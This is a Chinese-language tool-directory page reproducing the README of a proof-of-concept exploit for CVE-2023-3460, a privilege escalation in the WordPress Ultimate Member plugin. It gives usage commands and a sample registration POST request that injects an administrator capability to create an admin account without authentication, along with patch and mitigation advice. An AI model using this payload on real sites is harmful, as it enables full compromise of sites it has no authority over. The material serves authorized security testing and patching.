Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-3460 — CVE-2023-3460的概念验证漏洞利用,这是WordPress Ultimate Member权限提升漏洞。通过精心构造的注册请求创建管理员账户。仅限授权测试使用。 | Kitploit
工具/GitHubGitHub/gurjotexpert/cve-2023-3460
权限提升漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubgurjotexpert/cve-2023-3460

CVE-2023-3460

CVE-2023-3460的概念验证漏洞利用,这是WordPress Ultimate Member权限提升漏洞。通过精心构造的注册请求创建管理员账户。仅限授权测试使用。

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2023-3460 - WordPress Ultimate Member 权限提升利用程序

这是一个针对 CVE-2023-3460 的概念验证 (PoC) 利用程序,该漏洞是 WordPress 插件 Ultimate Member 中的一个严重漏洞。它允许未经身份验证的用户通过构造恶意注册请求将权限提升为管理员。

🔥 影响: 通过创建未经授权的管理员账户实现完全站点沦陷。


📌 漏洞详情

  • 受影响插件: Ultimate Member
  • 受影响版本: ≤ 2.6.6
  • 修复版本: 2.6.7
  • 利用类型: 通过注册滥用实现权限提升
  • 是否需要认证: ❌ 否
  • CVE: CVE-2023-3460

⚙️ 依赖要求

  • Python 3
  • requests 库
  • urllib3 库
  • beautifulsoup4 库

安装依赖:

root@kitploit:~
pip3 install requests urllib3 beautifulsoup4

🧪 利用方法

root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 

✅ 示例:

root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 

📥 利用脚本功能

  • 从注册页面获取 CSRF nonce (_wpnonce)
  • 绕过表单验证
  • 注入 wp_capabilities 并赋予 administrator 角色
  • 无需认证即可创建新的管理员用户

🔐 示例利用载荷

root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ 缓解措施

  • 将 Ultimate Member 插件更新至 v2.6.7 或更高版本
  • 如非必要,禁用开放注册
  • 监控用户创建日志以发现可疑活动

📚 参考

  • 🔗 Patchstack 公告
  • 🔗 NVD 上的 CVE-2023-3460

⚠️ 免责声明

此脚本仅用于教育和授权测试目的。未经授权利用系统是非法且不道德的。请仅在您拥有或有权测试的系统上使用。


👨‍💻 作者

  • 💀 [GURJOT SINGH]
  • 🔒 [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
下载工具